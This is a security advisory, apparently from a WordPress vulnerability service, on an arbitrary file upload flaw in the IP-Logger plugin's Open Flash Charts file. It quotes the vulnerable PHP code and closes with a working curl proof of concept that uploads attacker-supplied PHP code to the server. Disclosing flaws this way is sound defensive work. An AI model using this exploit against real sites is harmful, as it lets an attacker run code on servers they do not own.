One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor what look to be hacking attempts on our websites. Through that we recently came across a request for a file, /wp-content/plugins/ip-logger/chart/ofc_upload_image.php, which would be from the plugin IP-Logger. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.
We immediately recognized that file as being one from the library Open Flash Charts, which was discovered to have an arbitrary file upload vulnerability in 2009. In the case of this plugin a new version was never released to fix the issue.
The file takes raw post data and saves it in a file with a name specified by the GET input “name”, which is an arbitrary file upload vulnerability:
21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41
$default_path = '../tmp-upload-images/'; if (!file_exists($default_path)) mkdir($default_path, 0777, true); // full path to the saved image including filename // $destination = $default_path . basename( $_GET[ 'name' ] ); echo 'Saving your image to: '. $destination; // print_r( $_POST ); // print_r( $_SERVER ); // echo $HTTP_RAW_POST_DATA; // // POST data is usually string data, but we are passing a RAW .png // so PHP is a bit confused and $_POST is empty. But it has saved // the raw bits into $HTTP_RAW_POST_DATA // $jfh = fopen($destination, 'w') or die("can't open file"); fwrite($jfh, $HTTP_RAW_POST_DATA); fclose($jfh);
$HTTP_RAW_POST_DATA was removed as of PHP 7.0, so the vulnerability wouldn’t be exploitable if at least that version of PHP is in use.
Due to the fact that the vulnerability is being targeted by hackers we are adding it to the free data that comes with our service’s companion plugin, so that even those not using our service yet can be warned if they are using a vulnerable version of the plugin.
Proof of Concept
The following proof of concept will place the specified PHP code in to the file test.php in the directory /wp-content/plugins/ip-logger/tmp-upload-images/.
Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.
<?php $curl = curl_init(); $headers = array('Content-Type: text/plain'); $data ="[PHP CODE]"; curl_setopt($curl, CURLOPT_URL, 'http://[path to WordPress]/wp-content/plugins/ip-logger/chart/ofc_upload_image.php?name=test.php'); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_exec($curl); curl_close($curl); ?>